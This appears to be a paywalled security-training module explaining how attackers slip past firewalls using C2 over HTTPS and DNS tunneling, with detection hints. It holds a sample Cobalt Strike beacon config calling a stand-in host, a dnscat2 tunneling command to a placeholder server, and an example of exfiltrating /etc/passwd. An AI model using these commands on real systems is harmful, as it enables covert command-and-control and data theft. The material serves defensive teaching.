Firewalls see headers, not intent. A firewall rule that permits “outbound HTTPS to any destination” lets through: legitimate web browsing, cloud-based C2, data exfiltration, DNS over HTTPS, file sharing, and cryptocurrency mining β because they all look like HTTPS. This module is about why firewall logs alone never catch modern attackers, and what actually works.
Why this happens
Firewalls were designed to block unwanted traffic. Modern attacks don’t use unwanted traffic β they use wanted traffic turned to unwanted purposes. Every organization needs its employees to browse the web, use SaaS, join video calls, and exchange email. Every one of those protocols is a potential C2 channel, data exfiltration vector, or attack payload delivery mechanism.
The firewall’s fundamental capability β header-based decisions β is poorly matched to a world where 95% of outbound traffic is TLS-encrypted HTTPS that the firewall cannot inspect without TLS interception. And TLS interception breaks certificate pinning, breaks many SaaS applications, and creates its own attack surface at the interception proxy.
How attackers bypass firewalls β concrete techniques
C2 over HTTPS
The modern default. Beacon calls out over HTTPS to an attacker-controlled domain (or CDN-fronted domain). The firewall sees encrypted traffic to a reputable-looking host. Unless you have SSL interception + content inspection + behavioural analytics, this traffic is indistinguishable from normal web browsing.
# Cobalt Strike beacon default config
# ---
# spawnto = %WINDIR%\sysnative\rundll32.exe
# sleep = 60s (with 20% jitter)
# get-uri = /api/v1/sync
# useragent = Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...
# callback = https://cdn-frontend.example.com
# Traffic pattern: HTTP GETs every 60s, encrypted, to a domain with valid cert
# Firewall sees: outbound HTTPS to known-good category (CDN)
# Blue team sees: nothing unusual in traffic volumes
DNS tunneling
DNS is usually allowed outbound to anywhere (the firewall assumes it’s answering queries to the internet). Attacker encodes data in subdomain labels:
# DNS tunnel client (iodine, dnscat2)
dnscat2 --dns server=cmd-server.com --secret=shared_secret
# Attacker DNS server receives:
# Query: aBc123XyZ.cmd-server.com
# β decodes to "cat /etc/passwd"
# Response: dEf456UvW.cmd-server.com
# β encodes the passwd file contents
# To firewall: normal DNS traffic
# To defender without DNS analytics: invisible
Detection: DNS query entropy analysis, subdomain count per domain, response size patterns.
π Intermediate Module Β· Basic Tier
Continue reading with Basic tier (βΉ499/month)
You've read 25% of this module. Unlock the remaining deep-dive, quiz, and every other Intermediate module.
99+ modulesAll levels up to this tier
20-question quizzesUnlimited retries with explanations
Completion certificatesShareable on LinkedIn
6 more sections locked below
